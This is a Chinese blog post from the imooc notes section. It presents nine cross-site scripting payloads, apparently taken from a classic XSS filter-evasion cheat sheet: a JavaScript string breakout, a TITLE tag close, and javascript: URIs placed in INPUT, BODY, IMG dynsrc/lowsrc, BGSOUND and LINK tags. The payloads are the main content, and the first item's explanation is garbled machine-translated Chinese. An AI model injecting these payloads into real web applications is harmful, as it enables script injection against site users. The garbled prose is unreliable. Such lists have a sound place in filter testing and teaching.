继续浏览精彩内容
慕课网APP
程序员的梦工厂
打开
继续
感谢您的支持,我会继续努力的
赞赏金额会直接到老师账户
将二维码发送给自己后长按识别
微信支付
支付宝支付

xss***代码上

会当凌绝顶聪明
关注TA
已关注
手记 240
粉丝 36
获赞 122

1.逃离JavaScript逃脱了。 当应用程序编写一些用户信息输出到一个JavaScript如下:<脚本> var一个= " $环境{ QUERY_STRING }”;< /脚本>,你想将你的自己的JavaScript进去但服务器端应用某些引用你可以规避逃到逃离他们的逃避的特质。当这变得注入将读<脚本> var一个= " \ ";警报(“XSS”);/ /”;< /脚本>,最终un-escaping双引号和导致跨站脚本向量开火。使用该方法的定位XSS

代码:\";alert('XSS');//

2.标题标签中结束。这是一个简单的XSS向量<名称>关闭标签,可缩短了恶意跨站脚本攻击

代码:</TITLE><SCRIPT>alert("XSS");</SCRIPT>

3.输入图像

代码:<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

4.BODY image

代码:<BODY BACKGROUND="javascript:alert('XSS')">

5.(BODY tag这种方法,因为它不需要使用任何的基因型的“javascript:”或“<脚本…“完成XSS攻击),你可以把一个空间在等号(“onload = " != " onload = "
代码:<BODY ONLOAD=alert('XSS')>

6.IMG Dynsrc

代码:<IMG DYNSRC="javascript:alert('XSS')">

7.IMG lowsrc

代码:<IMG LOWSRC="javascript:alert('XSS')">

8.BGSOUND

代码:<BGSOUND SRC="javascript:alert('XSS');">

9.STYLE sheet

代码:<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

打开App,阅读手记
0人推荐
发表评论
随时随地看视频慕课网APP